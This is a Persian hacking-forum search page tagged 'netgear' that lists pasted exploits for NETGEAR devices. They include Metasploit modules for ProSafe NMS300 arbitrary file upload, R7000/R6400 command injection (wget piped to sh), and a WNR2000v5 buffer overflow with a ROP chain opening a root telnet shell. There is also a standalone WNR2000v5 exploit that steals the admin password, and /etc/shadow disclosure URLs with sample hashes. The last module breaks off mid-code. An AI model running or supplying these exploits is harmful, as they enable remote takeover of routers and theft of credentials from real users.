امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'netgear'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

7 نتیجه پیدا شد

  1. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload', 'Description' => %q{ Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. The application has a file upload vulnerability that can be exploited by an unauthenticated remote attacker to execute code as the SYSTEM user. Two servlets are vulnerable, FileUploadController (located at /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do). This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2016-1525'], ['US-CERT-VU', '777024'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30'] ], 'DefaultOptions' => { 'WfsDelay' => 5 }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => true, 'Targets' => [ [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 4 2016')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, "Application path", '/']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), 'method' => 'GET' }) if res && res.code == 405 Exploit::CheckCode::Detected else Exploit::CheckCode::Safe end end def generate_jsp_payload exe = generate_payload_exe base64_exe = Rex::Text.encode_base64(exe) payload_name = rand_text_alpha(rand(6)+3) var_raw = 'a' + rand_text_alpha(rand(8) + 3) var_ostream = 'b' + rand_text_alpha(rand(8) + 3) var_buf = 'c' + rand_text_alpha(rand(8) + 3) var_decoder = 'd' + rand_text_alpha(rand(8) + 3) var_tmp = 'e' + rand_text_alpha(rand(8) + 3) var_path = 'f' + rand_text_alpha(rand(8) + 3) var_proc2 = 'e' + rand_text_alpha(rand(8) + 3) jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); } catch (Exception e) { } %> | jsp.gsub!(/[\n\t\r]/, '') return jsp end def exploit jsp_payload = generate_jsp_payload jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) jsp_full_name = "null#{jsp_name}.jsp" post_data = Rex::MIME::Message.new post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"') post_data.add_part(jsp_payload, "application/octet-stream", 'binary', "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"") data = post_data.to_s print_status("#{peer} - Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/ print_status("#{peer} - Payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end print_status("#{peer} - Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_full_name), 'method' => 'GET' }) handler end end
  2. !/bin/sh # # NETGEAR ADSL ROUTER # Authenticated Remote File Disclosure # # Hardware Version: WNR500 / WNR612v3 / JNR1010 / JNR2010 # Firmware Version: 1.0.7.2 / 1.0.0.9 / 1.0.0.32 / 1.0.0.20 # # Copyright 2016 (c) Todor Donev # <todor.donev at gmail.com> # https://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # # Thanks to Maya Hristova that support me. http://USER:PASSWORD@TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa # #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: # root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: # #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
  3. #!/bin/sh # # NETGEAR ADSL ROUTER JNR1010 1.0.0.16 # Authenticated Remote File Disclosure # # Hardware Version: JNR1010 # Firmware Version: 1.0.0.16 # GUI Language Version: 1.0.0.16 # # Copyright 2016 (c) Todor Donev # <todor.donev at gmail.com> # https://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # # Thanks to Maya Hristova that support me. http://USER:PASSWORD@TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&var:language=en_us&var:language=en_us&var:menu=advanced&var:page=basic_home # #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: # root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: # #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
  4. Hacking

    # # Source: https://github.com/pedrib/PoC/blob/2133bc3c0864c332bff7ce1000c83311316ac8ff/exploits/netgearPwn.rb # # Remote code execution in NETGEAR WNR2000v5 # - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security # Released on 20/12/2016 # # NOTE: this exploit is "alpha" quality, however the bof method should work fine both with or without reboot. # A more reliable Metasploit module will be released soon. # # # TODO: # - randomise payload require 'net/http' require 'uri' require 'time' require 'digest' require 'openssl' require 'socket' #################### # ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c # and https://git.uclibc.org/uClibc/tree/libc/stdlib/random_r.c TYPE_3 = 3 BREAK_3 = 128 DEG_3 = 31 SEP_3 = 3 @randtbl = [ # we omit TYPE_3 from here, not needed -1726662223, 379960547, 1735697613, 1040273694, 1313901226, 1627687941, -179304937, -2073333483, 1780058412, -1989503057, -615974602, 344556628, 939512070, -1249116260, 1507946756, -812545463, 154635395, 1388815473, -1926676823, 525320961, -1009028674, 968117788, -123449607, 1284210865, 435012392, -2017506339, -911064859, -370259173, 1132637927, 1398500161, -205601318, ] @unsafe_state = { "fptr" => SEP_3, "rptr" => 0, "state" => 0, "rand_type" => TYPE_3, "rand_deg" => DEG_3, "rand_sep" => SEP_3, "end_ptr" => DEG_3 } # Emulate the behaviour of C's srand def srandom_r (seed) state = @randtbl if seed == 0 seed = 1 end state[0] = seed dst = 0 word = seed kc = DEG_3 for i in 1..(kc-1) hi = word / 127773 lo = word % 127773 word = 16807 * lo - 2836 * hi if (word < 0) word += 2147483647 end dst += 1 state[dst] = word end @unsafe_state['fptr'] = @unsafe_state['rand_sep'] @unsafe_state['rptr'] = 0 kc *= 10 kc -= 1 while (kc >= 0) random_r kc -= 1 end end # Emulate the behaviour of C's rand def random_r buf = @unsafe_state state = buf['state'] fptr = buf['fptr'] rptr = buf['rptr'] end_ptr = buf['end_ptr'] val = @randtbl[fptr] += @randtbl[rptr] result = (val >> 1) & 0x7fffffff fptr += 1 if (fptr >= end_ptr) fptr = state rptr += 1 else rptr += 1 if (rptr >= end_ptr) rptr = state end end buf['fptr'] = fptr buf['rptr'] = rptr result end ##################### ##################### # Ruby code ported from https://github.com/insanid/netgear-telenetenable # def telnetenable (username, password) mac_pad = @mac.gsub(':', '').upcase.ljust(0x10,"\x00") username_pad = username.ljust(0x10, "\x00") password_pad = password.ljust(0x21, "\x00") cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00") md5 = Digest::MD5.new md5.update(cleartext) payload = (md5.digest + cleartext).ljust(0x80, "\x00").unpack('N*').pack('V*') secret_key = "AMBIT_TELNET_ENABLE+" + password cipher = OpenSSL::Cipher::Cipher.new("bf-ecb").send :encrypt cipher.key_len = secret_key.length cipher.key = secret_key cipher.padding = 0 binary_data = (cipher.update(payload) << cipher.final) s = UDPSocket.new s.send(binary_data.unpack('N*').pack('V*'), 0, @target.split(':')[0], 23) end ##################### # Do some crazyness to force Ruby to cast to a single-precision float and # back to an integer. # This emulates the behaviour of the soft-fp library and the float cast # which is done at the end of Netgear's timestamp generator. def ieee754_round (number) [number].pack('f').unpack('f*')[0].to_i end # This is the actual algorithm used in the get_timestamp function in # the Netgear firmware. def get_timestamp(time) srandom_r time t0 = random_r t1 = 0x17dc65df; hi = (t0 * t1) >> 32; t2 = t0 >> 31; t3 = hi >> 23; t3 = t3 - t2; t4 = t3 * 0x55d4a80; t0 = t0 - t4; t0 = t0 + 0x989680; ieee754_round(t0) end # Default credentials for the router USERNAME = "admin" PASSWORD = "password" def get_request(uri_str) uri = URI.parse(uri_str) http = Net::HTTP.new(uri.host, uri.port) #http.set_debug_output($stdout) request = Net::HTTP::Get.new(uri.request_uri) request.basic_auth(USERNAME, PASSWORD) http.request(request) end def post_request(uri_str, body) uri = URI.parse(uri_str) header = { 'Content-Type' => 'application/x-www-form-urlencoded' } http = Net::HTTP.new(uri.host, uri.port) #http.set_debug_output($stdout) request = Net::HTTP::Post.new(uri.request_uri, header) request.basic_auth(USERNAME, PASSWORD) request.body = body http.request(request) end def check response = get_request("http://#{@target}/") auth = response['WWW-Authenticate'] if auth != nil if auth =~ /WNR2000v5/ puts "[+] Router is vulnerable and exploitable (WNR2000v5)." return elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/ puts "[-] Router is vulnerable, but this exploit might not work (WNR2000v3 or v4)." return end end puts "Router is not vulnerable." end def get_password response = get_request("http://#{@target}/BRS_netgear_success.html") if response.body =~ /var sn="([\w]*)";/ serial = $1 else puts "[-]Failed to obtain serial number, bailing out..." exit(1) end # 1: send serial number response = post_request("http://#{@target}/apply_noauth.cgi?/unauth.cgi", "submit_flag=match_sn&serial_num=#{serial}&continue=+Continue+") # 2: send answer to secret questions response = post_request("http://#{@target}/apply_noauth.cgi?/securityquestions.cgi", \ "submit_flag=security_question&answer1=secretanswer1&answer2=secretanswer2&continue=+Continue+") # 3: PROFIT!!! response = get_request("http://#{@target}/passwordrecovered.cgi") if response.body =~ /Admin Password: (.*)<\/TD>/ password = $1 else puts "[-] Failed to obtain admin password, bailing out..." exit(1) end if response.body =~ /Admin Username: (.*)<\/TD>/ username = $1 else puts "[-] Failed to obtain admin username, bailing out..." exit(1) end puts "[+] Success! Got admin username #{username} and password #{password}" return [username, password] end def get_current_time response = get_request("http://#{@target}/") date = response['Date'] Time.parse(date).strftime('%s').to_i end def get_auth_timestamp(mode) if mode == "bof" uri_str = "http://#{@target}/lang_check.html" else uri_str = "http://#{@target}/PWD_password.htm" end response = get_request(uri_str) if response.code == 401 # try again, might fail the first time response = get_request(uri_str) if response.code == 200 if response.body =~ /timestamp=([0-9]{8})/ $1.to_i end end end end def got_shell puts "[+] Success, shell incoming!" exec("telnet #{@target.split(':')[0]}") end if ARGV.length < 2 puts "Usage: ./netgearPwn.rb <IP:PORT> <check|bof|telnet <MAC>> [noreboot]" puts "\tcheck: see if the target is vulnerable" puts "\tbof: run buffer overflow exploit on the target" puts "\ttelnet <mac>: run telnet exploit on the target, needs MAC address" puts "\tnoreboot: optional parameter - don't force a reboot on the target" exit(1) end @target = ARGV[0] mode = ARGV[1] if (ARGV.length > 2 && ARGV[2] == "noreboot") || (ARGV.length > 3 && ARGV[3] == "noreboot") reboot = false else reboot = true end if mode == "telnet" if ARGV.length == 3 @mac = ARGV[2] elsif ARGV.length == 4 @mac = ARGV[3] else puts "[-] telnet mode needs MAC address argument!" exit(-1) end end # Maximum time differential to try # Look 5000 seconds back for the timestamp with reboot # 500000 with no reboot if reboot TIME_OFFSET = 5000 else TIME_OFFSET = 500000 end # Increase this if you're sure the device is vulnerable and you're not getting a shell TIME_SURPLUS = 200 if mode == "check" check exit(0) end if mode == "bof" def uri_encode (str) "%" + str.scan(/.{2}|.+/).join("%") end def calc_address (libc_base, offset) addr = (libc_base + offset).to_s(16) uri_encode(addr) end system_offset = 0x547D0 gadget = 0x2462C libc_base = 0x2ab24000 payload = 'a' * 36 + # filler_1 calc_address(libc_base, system_offset) + # s0 '1111' + # s1 '2222' + # s2 '3333' + # s3 calc_address(libc_base, gadget) + # gadget 'b' * 0x40 + # filler_2 "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload end # 0: try to see if the default admin username and password are set timestamp = get_auth_timestamp(mode) # 1: reboot the router to get it to generate new timestamps if reboot and timestamp == nil response = post_request("http://#{@target}/apply_noauth.cgi?/reboot_waiting.htm", "submit_flag=reboot&yes=Yes") if response.code == "200" puts "[+] Successfully rebooted the router. Now wait two minutes for the router to restart..." sleep 120 puts "[*] Connect to the WLAN or Ethernet now. You have one minute to comply." sleep 60 else puts "[-] Failed to reboot the router. Bailing out." exit(-1) end puts "[*] Proceeding..." end # 2: get the current date from the router and parse it, but only if we are not authenticated... if timestamp == nil end_time = get_current_time if end_time <= TIME_OFFSET start_time = 0 else start_time = end_time - TIME_OFFSET end end_time += TIME_SURPLUS if end_time < (TIME_SURPLUS * 7.5).to_i end_time = (TIME_SURPLUS * 7.5).to_i end puts "[+] Got time #{end_time} from router, starting exploitation attempt." puts "[*] Be patient, this might take up a long time (typically a few minutes, but maybe an hour or more)." end if mode == "bof" uri_str = "http://#{@target}/apply_noauth.cgi?/lang_check.html%20timestamp=" body = "submit_flag=select_language&hidden_lang_avi=#{payload}" else uri_str = "http://#{@target}/apply_noauth.cgi?/PWD_password.htm%20timestamp=" body = "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=secretanswer1&question2=2&answer2=secretanswer2" end # 3: work back from the current router time minus TIME_OFFSET while true for time in end_time.downto(start_time) begin if timestamp == nil response = post_request(uri_str + get_timestamp(time).to_s, body) else response = post_request(uri_str + timestamp.to_s, body) end if response.code == "200" # this only occurs in the telnet case credentials = get_password telnetenable(credentials[0], credentials[1]) sleep 5 got_shell #puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}" #puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!" exit(0) end rescue EOFError if reboot sleep 0.2 else # with no reboot we give the router more time to breathe sleep 0.5 end begin s = TCPSocket.new(@target.split(':')[0], 23) s.close got_shell rescue Errno::ECONNREFUSED if timestamp != nil # this is the case where we can get an authenticated timestamp but we could not execute code # IT SHOULD NEVER HAPPEN # But scream and continue just in case, it means there is a bug puts "[-] Something went wrong. We can obtain the timestamp with the default credentials, but we could not execute code." puts "[*] Let's try again..." timestamp = get_auth_timestamp end next end rescue Net::ReadTimeout # for bof case, we land here got_shell end end if timestamp == nil start_time = end_time - (TIME_SURPLUS * 5) end_time = end_time + (TIME_SURPLUS * 5) puts "[*] Going for another round, increasing end time to #{end_time} and start time to #{start_time}" end end # If we get here then the exploit failed puts "[-] Exploit finished. Failed to get a shell!"
  5. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => "Netgear R7000 and R6400 cgi-bin Command Injection", 'Description' => %q{ This module exploits an arbitrary command injection vulnerability in Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier. }, 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Author' => ['thecarterb', 'Acew0rm'], 'DefaultTarget' => 0, 'Privileged' => true, 'Arch' => ARCH_ARMLE, 'Targets' => [ [ 'Automatic Target', { } ] ], 'References' => [ [ 'EDB', '40889'], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'], [ 'URL', 'https://www.kb.cert.org/vuls/id/582384'], [ 'URL', 'http://kb.netgear.com/000036386/CVE-2016-582384'], [ 'CVE', '2016-6277'] ], 'DisclosureDate' => 'Dec 06 2016', 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp' } )) register_options( [ Opt::RPORT(80) ], self.class) deregister_options('URIPATH') end def scrape(text, start_trig, end_trig) text[/#{start_trig}(.*?)#{end_trig}/m, 1] end # Requests the login page which discloses the hardware, if it's an R7000 or R6400, return Detected def check res = send_request_cgi({'uri'=>'/'}) if res.nil? fail_with(Failure::Unreachable, 'Connection timed out.') end # Checks for the `WWW-Authenticate` header in the response if res.headers["WWW-Authenticate"] data = res.to_s marker_one = "Basic realm=\"NETGEAR " marker_two = "\"" model = scrape(data, marker_one, marker_two) vprint_status("Router is a NETGEAR router (#{model})") if model == 'R7000' || model == 'R6400' print_good("Router may be vulnerable (NETGEAR #{model})") return CheckCode::Detected else return CheckCode::Safe end else print_error('Router is not a NETGEAR router') return CheckCode::Safe end end def exploit return if check == CheckCode::Safe @cmdstager = generate_cmdstager(flavor: :wget, 'Path' => '/').join(';') send_request_cgi( 'method' => 'GET', 'uri' => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh" ) end # Return CmdStager on first request, payload on second def on_request_uri(cli, request) if @cmdstager send_response(cli, @cmdstager) @cmdstager = nil else super end end end
  6. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'time' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CRand def initialize(info = {}) super(update_info(info, 'Name' => 'NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow', 'Description' => %q{ The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi parameter. In order to exploit it, it is necessary to guess the value of a certain timestamp which is in the configuration of the router. An authenticated attacker can simply fetch this from a page, but an unauthenticated attacker has to brute force it. Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but it is guaranteed that it can be bruteforced. This module implements both modes, and it works very reliably. It has been tested with the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware revisions v4 and v3, but this has not been tested - with these routers it might be necessary to adjust the LibcBase variable as well as the gadget addresses. }, 'Author' => [ 'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['unix'], 'References' => [ ['CVE', '2016-10174'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'], ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'], ['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability'] ], 'Targets' => [ [ 'NETGEAR WNR2000v5', { 'LibcBase' => 0x2ab24000, # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so) 'SystemOffset' => 0x547D0, 'GadgetOffset' => 0x2462C, #The ROP gadget will load $sp into $a0 (which will contain the system() command) and call $s0 (which will contain the address of system()): #LOAD:0002462C addiu $a0, $sp, 0x40+arg_0 #LOAD:00024630 move $t9, $s0 #LOAD:00024634 jalr $t9 'Payload' => { 'BadChars' => "\x00\x25\x26", 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, } ], ], 'Privileged' => true, 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'DisclosureDate' => 'Dec 20 2016', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']), OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']), ], self.class) register_advanced_options( [ OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]), OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200]) ], self.class) end def check res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res.headers['WWW-Authenticate'] auth = res.headers['WWW-Authenticate'] if auth =~ /WNR2000v5/ return Exploit::CheckCode::Detected elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/ return Exploit::CheckCode::Unknown end end Exploit::CheckCode::Safe end def uri_encode (str) "%" + str.scan(/.{2}|.+/).join("%") end def calc_address (libc_base, offset) addr = (libc_base + offset).to_s(16) uri_encode(addr) end def get_current_time res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res['Date'] date = res['Date'] return Time.parse(date).strftime('%s').to_i end end def get_auth_timestamp res = send_request_raw({ 'uri' => '/lang_check.html', 'method' => 'GET', # automatically uses HttpPassword and HttpUsername to authenticate }) if res && res.code == 401 # try again, might fail the first time res = send_request_raw({ 'uri' => '/lang_check.html', 'method' => 'GET', # automatically uses HttpPassword and HttpUsername to authenticate }) end if res && res.code == 200 if res.body =~ /timestamp=([0-9]{8})/ $1.to_i end end end # Do some crazyness to force Ruby to cast to a single-precision float and # back to an integer. # This emulates the behaviour of the soft-fp library and the float cast # which is done at the end of Netgear's timestamp generator. def ieee754_round (number) [number].pack('f').unpack('f*')[0].to_i end # This is the actual algorithm used in the get_timestamp function in # the Netgear firmware. def get_timestamp(time) srandom_r time t0 = random_r t1 = 0x17dc65df; hi = (t0 * t1) >> 32; t2 = t0 >> 31; t3 = hi >> 23; t3 = t3 - t2; t4 = t3 * 0x55d4a80; t0 = t0 - t4; t0 = t0 + 0x989680; ieee754_round(t0) end def get_payload rand_text_alpha(36) + # filler_1 calc_address(target['LibcBase'], target['SystemOffset']) + # s0 rand_text_alpha(12) + # s1, s2 and s3 calc_address(target['LibcBase'], target['GadgetOffset']) + # gadget rand_text_alpha(0x40) + # filler_2 "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload end def send_req(timestamp) begin uri_str = (timestamp == nil ? \ "/apply_noauth.cgi?/lang_check.html" : \ "/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}") res = send_request_raw({ 'uri' => uri_str, 'method' => 'POST', 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }, 'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}" }) rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e return end end def exploit # 1: try to see if the default admin username and password are set timestamp = get_auth_timestamp # 2: now we try two things at once: # one, if the timestamp is not nil then we got an authenticated timestamp, let's try that # two, if the timestamp is nil, then let's try without timestamp first (the timestamp only gets set if the user visited the page before) print_status("#{peer} - Trying the easy way out first") send_req(timestamp) begin ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 }) if not sock.nil? print_good("#{peer} - Success, shell incoming!") return handler(sock) end rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e sock.close if sock end print_bad("#{peer} - Well that didn't work... let's do it the hard way.") # no shell? let's just go on and bruteforce the timestamp # 3: get the current date from the router and parse it end_time = get_current_time if end_time.nil? fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time") end if end_time <= datastore['TIME_OFFSET'] start_time = 0 else start_time = end_time - datastore['TIME_OFFSET'] end end_time += datastore['TIME_SURPLUS'] if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i end print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.") print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).") # 2: work back from the current router time minus datastore['TIME_OFFSET'] while true for time in end_time.downto(start_time) timestamp = get_timestamp(time) sleep 0.1 if time % 400 == 0 print_status("#{peer} - Still working, trying time #{time}") end send_req(timestamp) begin ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 }) if sock.nil? next end print_status("#{peer} - Success, shell incoming!") return handler(sock) rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e sock.close if sock next end end end_time = start_time start_time -= datastore['TIME_OFFSET'] if start_time < 0 if end_time <= datastore['TIME_OFFSET'] fail_with(Failure::Unknown, "#{peer} - Exploit failed.") end start_time = 0 end print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}") # let the router clear the buffers a bit... sleep 30 end end end
  7. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'net/http' require "base64" class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => "Netgear DGN2200 dnslookup.cgi Command Injection", 'Description' => %q{ This module exploits a command injection vulnerablity in NETGEAR DGN2200v1/v2/v3/v4 routers by sending a specially crafted post request with valid login details. }, 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Author' => [ 'thecarterb', # Metasploit Module 'SivertPL' # Vuln discovery ], 'DefaultTarget' => 0, 'Privileged' => true, 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'NETGEAR DDGN2200 Router', { } ] ], 'References' => [ [ 'EDB', '41459'], [ 'CVE', '2017-6334'] ], 'DisclosureDate' => 'Feb 25 2017', )) register_options( [ Opt::RPORT(80), OptString.new('USERNAME', [true, 'Username to authenticate with', '']), OptString.new('PASSWORD', [true, 'Password to authenticate with', '']) ]) register_advanced_options( [ OptString.new('HOSTNAME', [true, '"Hostname" to look up (doesn\'t really do anything important)', 'www.google.com']) ]) end # Requests the login page which tells us the hardware version def check res = send_request_cgi({'uri'=>'/'}) if res.nil? fail_with(Failure::Unreachable, 'Connection timed out.') end # Checks for the `WWW-Authenticate` header in the response if res.headers["WWW-Authenticate"] data = res.to_s marker_one = "Basic realm=\"NETGEAR " marker_two = "\"" model = data[/#{marker_one}(.*?)#{marker_two}/m, 1] vprint_status("Router is a NETGEAR router (#{model})") model_numbers = ['DGN2200v1', 'DGN2200v2', 'DGN2200v3', 